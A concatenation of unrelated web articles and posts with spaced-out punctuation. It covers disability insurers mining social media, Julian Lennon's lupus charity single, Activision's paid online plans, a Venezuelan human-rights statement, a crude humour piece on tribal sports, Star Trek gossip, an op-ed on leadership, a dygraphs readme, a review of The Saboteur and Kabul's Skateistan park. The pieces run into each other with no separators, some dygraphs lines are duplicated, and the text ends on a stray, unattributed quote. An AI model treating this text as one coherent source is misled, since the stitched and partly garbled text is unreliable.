That you admit to [ something ] must mean that [ condition ] is your fault and you violated [ clause ] in your insurance policy .
The very fact that you do anything other than bemoaning your lot in life must mean that you ’re not really disabled .
It ’s hard to think like insurance companies are looking over your shoulder , reading everything you write .
But it ’s important to think that way ; it ’s important to remember that the Internet is a public place .
Controlling the release of personal and identifying information about yourself is critical for self - protection .
You ca n’t control whether or not you get investigated , but you can try to limit what investigators see , and you can try to think about how an outsider might read a comment , photograph , post , or other activity .
And being aware of the dangers to others is important too .
If I talk about my “ hypothetical ” friend with [ condition ] who [ did something ] , am I inadvertently outing my friend ?
Can the insurance company connect me to [ friend ] and use what I wrote as evidence that [ friend ’s ] benefits should be denied ?
Can family members of [ friend ] figure out who I am talking about and draw conclusions of their own from what I wrote ?
That picture I posted on [ site ] with [ friend ] smiling and laughing , is that going to become the cornerstone of a case used to argue that [ friend ] does n’t have a chronic pain condition ?
A few examples of the large cost of small things :
In Toronto , a doctor ’s voicemail said he was on holiday , so it was decided that his signature on benefits forms was forged , and benefits were denied : “ Hundreds protest suspension of social assistance health benefit . ”
Profiles on social networking sites are used as evidence by insurance companies in benefits litigation : “ Think Before You ‘ Tweet ’ : The Perils of Social Utility Networks on Disability and Personal Injury Litigation . ”
The specifics of Nathalie Blanchard ’s story : “ Insurance Company Revokes Depressed Woman ’s Benefits Over Facebook Photos . ”
In new Jersey , several teens were denied eating disorder coverage because of content on their MySpace and Facebook profiles : “ Did Facebook lead to health insurance denial ? “
NEW YORK ( Billboard ) - After a decade - plus hiatus , Julian Lennon is making music again , and on his own terms .
Musician Julian Lennon arrives for a gala screening of Irish director Catherine Owens and U.S. director Mark Pellington 's film " U2 3D " at the 60th Cannes Film Festival , May 19 , 2007 .
REUTERS / Eric Gaillard
The singer - songwriter is prepping an album for spring 2010 , and on December 15 , his company the Revolution will release a four - track EP featuring the charity single “ Lucy . ”
The song pays tribute to Lennon ’s childhood friend Lucy Vodden , who inspired the Beatles classic “ Lucy in the Sky with Diamonds . ”
Vodden , who died in September of complications from lupus , was famously depicted by Julian Lennon in a watercolor painting that prompted his father , John Lennon , to write the surrealist “ Sgt. Pepper ’s Lonely Hearts Club Band ” tune .
Julian told Billboard.com that his charity single came together quickly after Vodden ’s death , when he was laying down background vocals for a song by one of the Revolution ’s new artists , James Scott Cook .
“ I learned of Lucy ’s passing during the actual process , ” Lennon said .
“ I ’d reacquainted myself with her through friends and businesspeople about two years ago , so I knew of her plight and was actually helping her to hopefully have a little more comfort in life . ”
Coincidentally , the song Lennon was helping Cook record was called “ Lucy . ”
Within a day the artists had reworked the song ’s lyrics and arrangement to make it a duet that celebrated Vodden ’s life , as well as Cook ’s 92 - year - old grandmother .
“ She ’s also suffered from lupus all her life , and her name is Lucy , ” says Lennon .
“ The song was done in an evening .
We thought , ‘ If we ’re going to do this , let ’s do it now in memory of Lucy , while we ’re all here and we have the energy . ’ ”
Proceeds from purchases of the single will go to the St. Thomas ’ Lupus Trust in Great Britain and the Lupus Foundation of America , two nonprofit organizations working to fight the autoimmune disease .
The EP also will feature an acoustic version of “ Lucy , ” the song “ Sober ” from Cook ’s upcoming album and the track “ Beautiful ” from Lennon ’s new album , “ Everything Changes . ”
“ It ’s actually the slowest and most emotional track on the album , ” Lennon said .
“ It was written about people I know and my friends know that have passed on in life . ”
‘ CAN’T HELP IT ’
“ Everything Changes ” will be Lennon ’s first album since 1998 ’s “ Photograph Smile , ” which arrived seven years after “ Help Yourself , ” his last release before parting ways with Atlantic Records .
He ’s spent the past 12 years focused on business pursuits and filmmaking ( he produced the 2006 documentary “ Whaledreamers ” ) , but eventually he felt compelled to start writing songs again .
“ I ca n’t help it -- I just have melodies and lyrical ideas that just come into my head whether I like it or not , ” he said .
“ I ’m almost plagued by it ... so I figure , I ’ve got to get it out my system . ”
In comparison with “ Photograph Smile , ” which was recorded with a full orchestra , the instrumentation on Lennon ’s new album was put together in a more piecemeal fashion .
“ It was done mostly at home , in my own time and just by working closely with friends , ” he said .
“ Whenever they ’d pop by for a cup of tea , I ’d go , ‘ Fancy putting a bassline on this or doing some cello or backgrounds ? ’
It was a pleasant process for me . ”
Once he ’d pulled together an album ’s worth of material , Lennon believed it was crucial that he come up with a new business model for releasing it .
“ I finished my album about a year ago , but with the demise of the labels and everything that was going on , I just did n’t see anything I quite wanted to sink my teeth into , ” he said .
“ I felt like there were potentially other ideas out there . ”
With the Revolution , Lennon has teamed up with digital entrepreneurs Michael Birch and Todd Meagher to fund artists like himself and connect them with music services like tour logistics , marketing and distribution .
He said the company will provide most of these services through its subsidiary , the Artist Alliance , and its affiliates .
“ I ’m hoping that it is revolutionary , ” Lennon said .
“ I think we have more maneuverability within the market than many other companies .
Should we need to change something on the drop of a hat , we can do that . ”
Lennon added that the type of artists he ’d like the Revolution to support are “ damn good singer - songwriters ...
I ’m still very much old - school .
I love an album that has its ebbs and flows and contemplates life . ”
Activision executive Tom Tippl has revealed plans to start charging gamers for certain aspects of online play in the Call Of Duty series .
According to IGN , Tippl wants to capitalise on the massive uptake in online multiplayer for titles such as COD : Modern Warfare 2 .
" It 's definitely an aspiration that we see potential in , particularly as we look at different business models to monetise the online gameplay .
There 's good knowledge exchange happening between the Blizzard folks and our online guys , " he said during a business conference .
" We have great experience also on Call Of Duty with the success we had on Xbox Live and PlayStation Network .
A lot of that knowledge is getting actually built into the Battle .
Net platform and the design of that .
" I think it 's been mutually beneficial , and you should expect us to test and ultimately launch additional online monetisation models of some of some of our biggest franchises like Call Of Duty . "
Blizzard , Activision 's partner division , has built a strong reputation for pioneering online monetisation on its World of Warcraft franchise .
Tippl said that he is confident shooter fans would be equally willing to spend money on appropriate paid - for online extras .
" Our gamers are telling us there 's lots of services and innovation they would like to see that they 're not getting yet , " he said .
" From what we see so far , additional content , as well as all the services Blizzard is offering , is that there is demand from the core gamers to pay up for that . "
Among options being considered for charging Call Of Duty users is a monthly subscription which opens up additional multiplayer modes and future bonuses .
This content is created and maintained by a third party , and imported onto this page to help users provide their email addresses .
You may be able to find more information about this and similar content at piano.io
According to figures revealed by trade unions , peasants and student leaders , there are currently 2200 people in Venezuela under schemes of presentation in court for exercising the constitutional right to protest for their basic demands .
The vast majority of people suffering from these processes belong to workers unions , peasants , students and people communities , being the most dispossessed and vulnerable the ones who suffer the infringement of their rights .
What was an isolated and eventual policy has become a state policy .
On the one hand , police officers , the prosecutors and judges , on the other , hired killers led by landowners and business sectors , plus shock troops allied with national , regional and local governments regardless their political orientation , all form the triangle of repression to the social fight .
Such criminalization , encouraged by different branches of the government , businessmen and landowners , is made in a context of rising demonstrations for social rights so the government has been applying several regulations to those who occupy lands to demand their right to land and housing , to communities that close the streets to seek or improve public services , the workers that pressure to defend their source of work , achieve better wages and achieve collective hiring , to students demanding resources for their schools , users of primary health services and several other sectors in struggle for their social and political rights .
Therefore , the above is an evidence of the strategy applied by the state and some private sectors to restrict legitimate protest and the enjoyment of human rights enshrined in the Constitution .
As a counterpart we have the situation of impunity for crimes occurred against social fighters , where the signs of participation of businessmen and landowners in the assassinations of workers ’ leaders and peasants have not been investigated and punished at all , and neither the political responsibility of regional leaders in some of the cases .
This impunity has encouraged the hired killers as a method to silence and intimidate the sectors in struggle for their rights .
While in this mode there is a high percentage derived from the feuds between trade associations for the control of jobs , as happens in the construction sector , there have been several cases where the contract killing aims to fulminate and dissolve unions who dare to move for their claims and the more radical workers ' struggles .
For this reason a group of social organizations and human rights , student and academics groups as well as different individuals , promote a campaign to defend the right to protest , as lies in the universal declaration of human rights and the Constitution , and condemn the opening of trials , the use of hired killers and other mechanisms against this right such as legal measures that ban the execution of assemblies and strikes within SOEs .
In this regard , we want to make the present statement to raise public awareness about this serious restriction of the rights , and urge all unions , peasants , community and students organizations , as well as the alternative media to join actively this national campaign to defend the legitimate right to social protest .
We ask for :1 ) The repeal of sections 284 , 286 , 297 and 358 of the Penal Code ; 47 , 48 , 49 , 50 , 53 and 56 of the Organic Law of the Nation Security and Defense , 139 and 141 of the Law for the protection of individuals with access to goods and services , as well as 20 , 24 and 25 of the Special Law of popular Defense against hoarding , the boycott and any other conduct that affects the consumption of food or products subject to price controls ; all of which penalize the right to protest .
2 ) The unbiased and clear investigation of all crimes of hired killers and other crimes against peasants , workers and other social actors as well as the prosecution and punishment for the offenders .
3 ) The full and immediate freedom for all the social activists in detention for protesting , the suspension of the scheme of regular reporting to the courts and other measures prohibiting union work in the working centres .
4 )
No use of the security forces against demonstrations for social and political rights .
Banning the use of firearms and tear gas by police and military during protests , and when they execute eviction proceedings against actions demanding the right to housing and public services .
Programa Venezolano de Educación - Acción en Derechos Humanos ( Provea ) ; Unidad Socialista de Izquierda ( USI ) ; Corriente Clasista Unitaria Revolucionaria y Autónoma ( CCURA ) ; Sindicato de Trabajadores del Inces ( SINTRAINCES ) ; Acción Solidaria ; Convite ; Periódico El Libertario ; Espacio Público ; COFAVIC ; Colectivo Socialismo Revolucionario ( CSR ) : Liga de Trabajadores por el Socialismo ( LTS ) ; Movimiento Solidaridad Laboral ; Sinergia ; Comité de Víctimas contra la Impunidad Lara ( CVCI - Lara ) ; Indubio Pro Reo ; Domingo Alberto Rangel .
More info in the blog http://protestarnoesundelito.blogspot.com ( in Spanish ) , and in http://www.nodo50.org/ellibertario ( in Spanish , English & other languages ) .
Translation : Julio Pacheco
As children , we dream of becoming a superstar in a sporting discipline .
We all have our reasons for the dream ; we may crave the fame , the fortune , the hopes of becoming a legend , or just because we know it will bring us home a lot more women .
But there is no doubt that some of us struggle to find a sport that suits us , as we taste the dog turd that has somehow found its way onto the school pitch , commemorating our sixteenth straight sack .
So if that is you than how about hanging up that urine soaked jockstrap and trying out a different sport , a tribal sport that maybe not many are familiar with , giving yourself more of a chance .
We all know Lacrosse started as a tribal sports , but how about trying …
1 ) Rarajipari
Running extreme distances is usually quite a lonely discipline , you generally have to keep your mind on other things , such as how you intend to execute your plan to make Megan Fox lick your face and how to become more economically sound when doing your weekly shop .
Based in Mexico , the runners of the Tarahumara ( though they refer to themselves as the Raramuri ) tribe do not need to worry about these things though , for their event , Rarajipari , is ran in teams from three all the way up to ten men .
This is because this foot race of 150 - miles which must already seem like listening to Fidel Castro ’s 32 hour speech in reverse with a chaffing rash spreading on your body , also requires immense teamwork .
The extra challenge is that each team has to dribble a small wooden ball across the entire shit laden , barely signposted terrain .
If it storms , they brave it .
If its dark , other team members light torches .
This is a race that can take up to two days .
The wooden ball is about the size of a baseball , though that is not necessarily important since kicking anything wooden , regardless of size will eventually begin to hollow out your toes .
Luckily , the Tarahumara tribe have appropriate footwear …oh …. wait … they do n’t .
The Tarahumara opt for a pair of comfy homemade sandals and if they do n’t work out , perhaps due to blisters , then straight - up barefoot running is dandy .
But the Tarahumara run differently to us , they run as we are meant to run , on our tip - toes .
By avoiding the impacts on their heels , they avoid the shock rising to their knees , instantly giving an advantage over most sport trainer wearing muscleman .
So what is the Tarahumara ’s secret ?
Couch potatoes rejoice !
For the Tarahumara ’s preparation is predominantly consisted of drugs and corn - based alcohol but sadly no sex .
Sex with the Tarahumara women before the race is banned so in their place they mix some dried bats blood with the tobacco and smoke it all down to instantly gain that special spinach Popeye edge .
As with seemingly all tribes , there is a medicine man supporting the teams by mixing good potions and bad potions out of his own excrement ( maybe ) .
Possibly the most bizarre thing the medicine man does is to dig up a dead person ’s shin bone , and after crushing it , he will proceed to drop the pieces of the bone across the track .
We are taking a guess he does n’t walk the whole track , instead getting a bit pissed with it all and heading back after a couple of miles .
The Tarahumara also stand up pretty well to runners across the globe as runners of the Leadville Trail 100 ( A 100 - mile race through the Rocky Mountains ) found in 1992 .
Some of the participating Tarahumara did try out some professional cross - trainer shoes but only for a few hours before switching back to those speedy sandals which soon saw Victoriano Churro , a 55 - year old farmer whose shin bone would probably be crushed and spread over a track in future , cross the finish line ahead of everyone else .
So how do you stop these unstoppable wooden ball , dribbling machines ?
Apparently they never stop because of exhaustion , only through fear .
So next time you are challenged to race a Tarahumara tribe member , whip out the “ Scream ” mask and watch them jog off to the nearest medicine man for some much needed excrement ( maybe ) to ward off the evil spirits .
2 ) Suri Stick Fighting
Do you remember the good old days when you and your fellow nerdy pal would go at it against each other in the garden , imitating Luke Skywalker and Darth Vader light saber fights ?
Well this is similar to what the people of the Surma , a collective name for the tribes of Suri , Mursa and Me ’en based in Ethiopia , get up to .
The only differences are their play fighting is more like actual fighting that occasionally results in death and their mock light sabers are eight foot long , hard wooden sticks called “ Donga ” .
The fight is essentially a duel between two males which historically was used as a means for a man to prove his worth to the women of the tribe , however nowadays , probably because women are now looking for a more sophisticated man who can cook a good goulash , the fighting is often more based around the male bravado and the need to school the young ones in the art of war .
The contests are usually held between the various villages with the aim being for the two duellists to draw blood from the head or the feet , a long way from Gladiators such as Laser and Ice hitting each other in the naughty parts with foam batons .
The battles are refereed and it is quite common in the fights for them to end in a draw or someone breaking the rules .
What is frightening though it is just as common for an opponent to die from a blow to the stomach which would be a complete waste of a digested goulash .
Recently , the competitions have degenerated with many of the crowds bringing their own methods to make sure who they bet on wins .
The methods mainly fall under one category , guns , lots of guns .
Having seen numerous John
Woo films , the participants all pull out their guns and fall into Mexican standoffs , uttering witty one - liners .
This new method of fighting clearly makes it difficult for a fledgling stick - fighter build a reputation for himself as it wo n’t be too long before his “ Donga ” is split in two by a bullet .
3 ) Bhutan Archery
Back in World War 1 , pilots used to take pot shots at each other with their pistols in the wide open sky .
There never usually was a victor and if there was you can bet that they were called “ Lucky Larry “ or “ Hotshot Harry ” .
The chances of hitting each others planes were obviously worse than your chances with that coffee shop girl who you always envisage massaging the coffee beans on her body before grinding them .
This is pretty similar to our next tribal sport , Bhutan Archery .
Played between rival village teams , the difficulty here lies in the fact that the targets you are meant to hit are three times further away than the Olympic standard and do n’t necessarily sit on the same elevation .
Unfortunately for the competitors , sniper rifles and binoculars are not used , instead the majority of the contestants shun even the better calibrated bows for their traditional hand - carved bamboo bows , which is quite a brave choice unless you ’ve been practicing a lot of archery on your Wii .
The six represents how many times he has hit the target in his lifetime .
The difficulty takes an extra rise as you will also have someone who seemingly wants to compete in the next gurning championships , bouncing about mocking you as you take your shot .
This is because the competitors of the other village are allowed incredible amounts of freedom to put you off you ’re A - game , yes they can hold up beers or boobs .
Or both …
4 ) Sumbawa Buffalo Races
The basic requirements for Sumbawan buffalo racing are somewhat specialized .
First , of course , you need a bunch of water buffaloes , because how else are you going to race ?
The arena is a waterlogged paddy field .
Pairs of buffaloes are harnessed to a rickety wooden sled upon which a young farmer will stand for the duration of the race , steering and whipping the animals as they galumph through the knee - deep muddy water .
It ’s far more civil than Bull Fighting , because you do n’t kill the Buffalo at the end , although they ’ll wish they were dead .
That actual course is quite small , but the challenge itself is still as hard as giving yourself a bit of self - pleasure when you know your Mum ’s on her way up the stairs with milk and cookies .
The course involves a jump followed by the difficulty of being able to steer your frame into a small magically charged doll at the end of the course .
If you manage to make it to the end and miss the doll , people will care about you as much as they care about their friend ’s septic bunion .
To record a time , you must hit the doll , and considering the width of the course , any deviation from a straight line probably means game over .
Traditional blessings and rituals all take place in the run up to the tournament but it ’s the care and nurture of the buffalo that could be crucial to success .
Cue the over the top montages of you and your buffalo rolling around in a pool of mud and running gaily through the fields .
With all this said , the buffalo are likely to forget all this on race day and just collapse into the jump .
Running a business is like riding a roller coaster .
Although it is fun and exciting , there will be times when you feel scared and powerless .
During the bad times , there is n’t much you can do other than to keep on pushing forward .
Save your favorite business quotes in one place across all the document apps you use .
In that spirit , here are 101 quotes that will motivate you to push forward .
The latest Byteside podcast delves into all the pre-order shenanigans , Xbox buying Bethesda and co , the NBN fibre renaissance , and the re-release of HeroQuest .
Oh , and is this our last mention of Quibi ?
When you ’re entertaining guests , you can save yourself time by pre-mixing a pitcher of cocktails .
This is simple to do – just follow the tips below .
Premixing a pitcher of cocktails
You can pre-mix a pitcher of cocktails up to a week before your party , as long as you do n’t add ice until you ’re ready …
Read More
By Captain Pyke | December 28 , 2009 - 10:27 pm
Zoe Saldana is not only busy with Avatar promotions , but she 's also making more Star Trek XII predictions .
Star Trek XI 's Uhura is kinda known for incorrect production assumptions , what with her Comic - Con claim of the Star Trek XII script being halfway done .
We can't really blame her though , we 're just as excited to see the next film and we sure hope she 's right about her latest prediction .
Check out the article excerpt below .
J.J. Abrams is busy with other projects right now , but that 's not keeping Zoe Saldana ( who plays Star Trek 's Uhura ) from giving us a few tidbits of information about the upcoming Star Trek 2 movie plans .
Zoe Saldana , a self - proclaimed sci- fi geek who just happened to land the role of Uhura in J.J. Abrams ' reboot of Star Trek , told Collider that pre-produciton on Star Trek 2 could start as early as December of 2010 .
“ I spoke to J.J. and Bryan Burk , his producing partner at Bad Robot , and they are still in the middle of building the script with Alex Kurtzman and Bob Orci , and we ’ll probably be going into pre-production around this time next year . ”
Of course , this does not mean that a script has been penned , or even that J.J. Abrams ' and company know exactly where they 're going with the next installment of the geek - and - non - geek - friendly reboot of the Star Trek franchise .
Only the J.J. knows what he and his crew are going to make of this series , and it is unlikely that they have had the chance to solidify anything just yet .
( source Examiner.com )
Read the full article here .
When George Bush was running for president in 2000 , there was a sales pitch in his stump speech that never failed to offend my European ears .
" I'm a leader , " he would boast , with a particular emphasis , as though this entitled him to the top job without further explanation .
He never , in my hearing , said he was qualified to be a leader because he had a Harvard MBA , though he did .
Nor did I ever hear him refer specifically to his co-ownership of the Texas Rangers baseball team , though that might not have been irrelevant .
Every now and again he did mention his job as Governor of Texas , although he had campaigned for that job with the same sense of leader 's entitlement as he was now employing to win the presidency .
He seemed to treat leadership as an innate and self - perpetuating quality , something innate , rather than inculcated through education or training which , given his lineage , might have been a reasonable assumption .
But it was also a quality that appeared to be hugely in demand in the United States .
Download the new Independent Premium app Sharing the full story , not just the headlines
Whenever I received CVs from someone hoping for an internship in this newspaper 's Washington office , the application invariably contained a paragraph about the candidate 's leadership skills , right before one saying what a splendid " team player " they were .
Obviously , any American CV had to hedge its bets , while a US president is supposed to lead – even if leadership ability is to be judged , as it surely is , less by the leader than the led .
Given where George Bush 's leadership ability took the United States , it is perhaps unsurprising that neither of his would - be successors claimed " being a leader " as their forte .
That might also be because , as senators , their experience was not primarily in an administrative role .
The absence of " leadership " boasts from that campaign , however , has not halted an ever louder and more urgent clamour for " leadership " since , not just on the national scale , but , as is even more striking , globally .
Take last week .
When President Obama delivered his long - awaited address on Afghanistan policy , there were countries where real , practical , actions would be determined by what he had to say .
It was , after all , not just the US military that had been awaiting its orders , but the Nato allies , starting with Britain , France and Germany , who needed to know what would be asked of them .
Then there was Afghanistan – the government , the regions and the Taliban – all waiting to hear what direction the US would take .
Yet it was not only these countries , governments , military commanders and , indeed , rebel groupings , that seemed to be keenly awaiting what the US President had to say – and periodically asking what was taking him so long .
The expectation , and the frustration , went far wider .
A large part of the world seemed to be waiting for Mr Obama as the acknowledged standard - bearer of the globe .
When he said , as he did in his speech , that the only nation he was interested in building was his own , the disappointment was palpable , as though a US President , whose election had been hailed around the world , was somehow guilty of poverty of ambition .
Such disappointment is at its most acute where the US President is concerned .
His early speeches , not least the one to the Muslim world in Cairo , were widely interpreted as evidence of benevolent global reach , rather than a desire to right wrongs in US relations with a particular part of the world .
There is a sense in which the award of the Nobel Peace Prize – which Mr Obama will receive in Oslo on Thursday – was itself an expression of that early hope that Barack Obama 's soaring eloquence would be matched by action on the same sweeping scale .
Similarly , his decision to travel to the Climate Change summit at all , and then for the end rather than the opening , is interpreted as something of a talisman .
It has been hailed as a sign that the Copenhagen meeting – historic , global , you choose the adjective – could actually succeed in helping to save the planet .
But similar , if more modest , hopes are applied to other political leaders .
During Germany 's election campaign , the Chancellor , Angela Merkel , was repeatedly challenged about her supposed unwillingness or inability to lead .
The fact that Germany 's awkward coalition had held together for its whole four - year term was not considered counter - proof enough .
In Britain , Gordon Brown is repeatedly assailed with complaints that he lacks leadership ability – the comparison being with his predecessor , Tony Blair .
But is there perhaps confusion here between leadership ability and charisma , even demagogy ?
Taking people along with you may include the capacity to inspire , perhaps to deceive .
But might it also include the less exciting ability to persuade with a compelling argument ?
A debate was very nearly , but not quite , had over leadership and what it means , as the recent appointments to the top posts in the European Union were finalised .
There was plenty of public noise and advocacy in advance .
But behind the scenes the 27 national leaders reached a consensus about the qualities they wanted in their president and high Representative , which explains the low - key choices made .
The 27 , it appears , wanted people capable of bringing others together and facilitating acceptable solutions .
They did not want a high - profile standard - bearer who , in that celebrated expression , would " stop the traffic in Beijing " .
But who is to say that this quieter concept is not leadership , too ?
The interconnectedness of the world , thanks to instant communications , has surely contributed to the idea that a single , inspirational leader would be an asset : a " take me to your leader " syndrome .
But perhaps , in the cacophony of competing national and sectional voices , the opposite is now true .
This need not mean world governance by cumbersome committee , but a recognition that the promise held out by a single inspirational individual is likely to be vain amid so much difference .
Boring it may be , but effective chairmanship is a much underestimated strength – and one that might have made history look more kindly on George Bush .
m.dejevsky@independent.co.uk
Originally Posted by grom Originally Posted by
Actually I 'd disagree about that - we had quite a few instances last night where people got really really close to capturing the intel but were gunned down a gnat 's chuff away - I guess it depends on your attitude - I thought it was funny and led to edge of the seat play but maybe others would find it too frustrating .
I also found it amusing that quite often last night we ended up with both teams camping out in each others intel rooms - this ties in with the above , it was quite easy to steal the intel but very hard to do those last few metres to capture it without a group effort .
It played beautifully though - I tried playing with most classes and found good ways to play as each - we had a lot of people on the server and played it through at least three times without everyone leaving - I think it 's a tribute to you that it was only when you changed away from Flakey that some people left the server ( including me but I was dead on my feet by then )
Features
Handles huge data sets : dygraphs plots millions of points without getting bogged down .
: dygraphs plots millions of points without getting bogged down .
Interactive out of the box : zoom , pan and mouseover are on by default .
: zoom , pan and mouseover are on by default .
Strong support for error bars / confidence intervals .
/ confidence intervals .
Highly customizable : using options and custom callbacks , you can make dygraphs do almost anything .
: using options and custom callbacks , you can make dygraphs do almost anything .
dygraphs is works in all recent browsers .
You can even pinch to zoom on mobile / tablet devices !
on mobile / tablet devices !
There 's an active community developing and supporting dygraphs .
Getting Started
Start by downloading dygraphs .
Then read the Tutorial to learn how to use it , or just play with dygraphs on jsFiddle .
Once you 've got your feet wet , look for inspiration in the demo gallery or check out our list of users .
If you 're using npm and a bundler like webpack , browserify or rollup , you can install dygraphs via :
npm install -- save dygraphs
import Dygraph from ' dygraphs ' ; // or : const Dygraph = require ( ' dygraphs ' ) ; const g = new Dygraph ( div , data , {} ) ;
and use it via :
Check out the dygraphs ES6 sample project for more details on this approach .
There are n't many games like Pandemic Studios ' The Saboteur .
As opposed to other games set during World War II , it is n't a first - person shooter that has players mowing down endless waves of Nazi troopers .
Instead , it 's a third - person adventure that requires judgment and discretion , and it uses some stunning art direction as a significant part of its gameplay .
The game , which also happens to be the late developer 's final release , is a bittersweet thing to play : it gets so much right , but one has to wonder how much better it would have been if Pandemic had n't been shut down , partially due to the debacle that was The Dark Knight game adaptation .
Our story begins in Nazi- occupied Paris .
The city is gripped by fear , and the invaders are terrorizing its citizens .
Sean Devlin , an Irish race car driver ( based on real - life French Resistance member William Grover - Williams ) is hiding out in a popular cabaret club , keeping his head down , and nursing his hatred for the Germans while simultaneously nursing drinks .
Devlin's best friend was murdered by a high - ranking member of the Third Reich ; as a result , he 's easily recruited by the French Resistance to throw a monkey wrench into the invasion 's engine .
Title The Saboteur Developer Pandemic Studios Publisher Electronic Arts Price $ 49.99 to $ 59.99 Shop.ars Platform Xbox 360 ( reviewed ) , PlayStation 3 , PC
This is simultaneously a tale of personal vengeance and an epic war story , with some Indiana Jones - like supernatural elements thrown in , without getting too ridiculous .
As a result , the game 's plot goes all over the place , but it balances story elements competently .
Overall , the story is gripping , fun , and maintains just enough tension to keep things compelling .
Who says games are n't art ?
The game 's strongest aspect is , without a doubt , its art design .
While the character models are n't anything amazing , the city and countryside is lovingly rendered , conveying just how beautiful Paris and its surrounding farmland was before the Nazi occupation .
But the best part of the game 's style is how wonderfully it is used to convey mood .
At the start of the game , the entire city is a shadow of its former glory : rain seems to constantly be falling from cloudy skies , and the world is nothing more than shades of grey ; the only color that regularly appears is the red of spilled blood , Nazi armbands , and German flags hanging from buildings .
Once Sean starts waging his one - man war against Germany 's invasion force , neighborhoods regain their luster , with stellar results .
Meanwhile , the colors of Paris 's revitalized areas are wonderful , conveying mood far better than any character animation could ever hope to .
Some of the best moments , though , are when you 're scouting out locations from the rooftops of Paris and can see the contrast between the free and oppressed areas : the contrast between the color and shades of grey is simply breathtaking .
Needless to say , the game 's artwork is absolutely beautiful and creative , but it never feels out of place in an action game .
The Saboteur 's use of color is stunning , which makes for a winning combination with the intense action sequences .
No area of Paris looks like any other , and the fact that a game world so large is easy to navigate is an accomplishment in itself .
The architecture and landscape changes from one neighborhood to the next , and landscapes like Notre Dame , the Arc de Triomphe , and the Eiffel Tower are all visitable .
Paris actually feels like a real city , one that is far more believable than the open cities that have appeared in so many other games .
Open world : both a blessing and a curse
The Saboteur is an open world game that allows players to wander anywhere they want in WWII Paris .
Taking a note from Assassin's Creed , Sean can climb up walls and buildings in order to navigate the city without attracting unwanted attention , but the parkour moments are rather slow and boring , as opposed to fast - paced and fluid like such action should be .
Unfortunately , The Saboteur also falls prey to the design flaw of providing too many similar quests .
Sure , it 's fun to run through the city and plant dynamite at the base of sniper towers , propaganda speakers , and anti-aircraft guns , but the fact that there are hundreds of these free - play missions means they start to run together after the first few dozen times you experience them .
None of these free - play moments are boring or badly executed , but it sometimes feels like there are way too many of them , which detracts a bit from the overall experience .
At least the story missions are all pretty varied , and completing them increases the " Will to Fight " of Paris 's population .
As the WtF increases enough to bring color back to a neighborhood , the Nazi presence is no longer gone , but it is severely reduced .
These neighborhoods eventually establish pocket areas where the French Resistance will appear and help Devlin fight against the forces of the Third Reich if they 're pursuing him .
It will take a little while to get to this point , but once you get there , the game becomes even more action - packed .
Accomplishing missions of any type earns Devlin contraband items , which are the game 's form of currency .
You can spend contraband on weapons , vehicles , and various upgrades ; the good thing about the plethora of free - play spots is that there are countless opportunities to earn some cash , no matter what your style of play is .
Aside from being able to purchase upgrades , you can also earn " perks " by accomplishing special achievements .
For example , blowing up a certain number of German towers will allow you to carry more explosives , while stealth - killing five Nazi generals will provide Devlin with a new , deadly , attack .
These perks do a lot to help even the playing field later on , since enemies become better - equipped and more powerful as the game progresses .
The stealth needs some more sneakiness
The biggest problem with The Saboteur , though , is that it has a large emphasis on stealth during the main missions .
Unfortunately , keeping out of sight when you 're trying to avoid detection is easier said than done .
The only stealth mechanic you have at your disposal is a silent walk and the ability to disguise yourself as a German soldier if you performed a silent kill on them ( bloody uniforms are automatically unavailable , so do n't expect to put on a German outfit if you 've just shot someone ) .
It 's a shame that there 's no ability to hide in the shadows , or have a better warning system that tells you when you 're starting to be observed .
As a result , it 's actually easier to just run through parts of a mission with both guns a - blazin ' and then deactivate the alarms or find a hidey hole to take the heat off .
Unfortunately , the game 's stealth scenarios are n't all that amazing , which is somewhat problematic because many core missions are stealth - based .
Thankfully , the direct approach to action is as strong as the stealth portions are weak .
Aiming is easy , taking cover is automatic , and the enemies are tough enough to provide a reasonable challenge .
This is something to be expected from Pandemic based on the studio's track record with the Mercenaries games .
There 's also an abundance of firearms to use , and even normal vehicles can be weaponized later on in the game .
Devlin 's brawling maneuvers , while effective against one or two opponents , are n't all that useful when more enemies appear , meaning that it 's generally safer to stick to guns and explosives .
It 's a shame that Pandemic was liquidated after finishing The Saboteur earlier this year .
The game is a lot of fun in spite of some shortcomings .
Had there been some more time to apply some polish to the title , this probably could have been an epic masterpiece .
As it is , it 's an action title that 's still better than most of the other games on the market , and will provide more than enough enjoyment to justify a purchase .
Verdict : Buy
KABUL ( Reuters ) - Afghanistan ’s first skateboarding park and school opened in Kabul on Tuesday with a boarding showdown between dozens of youngsters -- ranging from ministers ’ children to streetkids -- that it aims to bring together .
Slideshow ( 18 images )
“ Skateistan ” started two years ago in a dried - up fountain in the heart of the Afghan capital , when two Australians with three skateboards started teaching a small group of fascinated kids .
Now dozens of boys and girls from across all social classes can mix in a giant indoor park that looks like a cross between a military hangar and an urban hangout , festooned with the names of fashionable skating brands that have sponsored the park .
Classes are free , and at the back of the skating section are neat changing areas and classrooms where children can study everything from basic literacy to advanced computing when they put down their boards and take off their helmets .
“ A year ago this was empty land , there were just dogs here , ” said Fraidoon Ilham , who helps write speeches for President Hamid Karzai as his day job but also helps Skateistan sort through the legal and government pitfalls of operating in Afghanistan .
One of the world ’s poorest and most conservative countries seems a strange place to set up a skateboarding school , but the founders say it has proved a remarkably successful way to reach out to marginalized children , particularly girls .
Sports such as football are seen as men ’s activities , but skateboarding is novel enough to be open to women .
“ I want to be a professional skateboarder in future like my teacher , and help other children learn how to skate , ” said 10 - year - old Mahro , a star student who seems undaunted by either traditional ideas about women or the steepest ramps in the park .
She has been skating for a year and would like to come every day , she says , shrugging off grazes on her hands from tumbles .
OLYMPIC SUPPORT
So far Skateistan have won donations of $ 650,000 , around two thirds of which went toward the 1,800 sq m ( 19,380 sq ft ) indoor arena .
The head of the Afghan Olympic Committee , which has donated the land for the park and is providing water , power and security , officially opened the indoor park and launched an enrolment drive .
An outdoor area will follow .
“ We managed to bring together about 200 street children , this sport is not only entertainment for them , it is also giving them hope for their future , ” said AOC head Mohammad Zahir Aghbar .
“ I am working hard to expand this process , not only in the capital but further out , in the provinces also . ”
The children he hopes to help are those like 11 - year - old Fazila , who used to sell chewing gum on the street , but was allowed to go to school and skate classes after Skateistan arranged to pay her parents the $ 1 a day she used to earn .
“ I want to be able to jump like teacher Ollie .
I can do a little already , ” she said with a shy grin , before wheeling off to tackle the two quarter ramps that make up the “ Afghan gap ” in her traditional headscarf and shalwar kameez , beside the children of Afghanistan ’s elite .
“ I do n’t look at it as payment , ’’ Spaulding says .
“ It ’s what it takes to get the job done .
To me this whole thing is a wide - cast net that does n’t make a lot of sense .
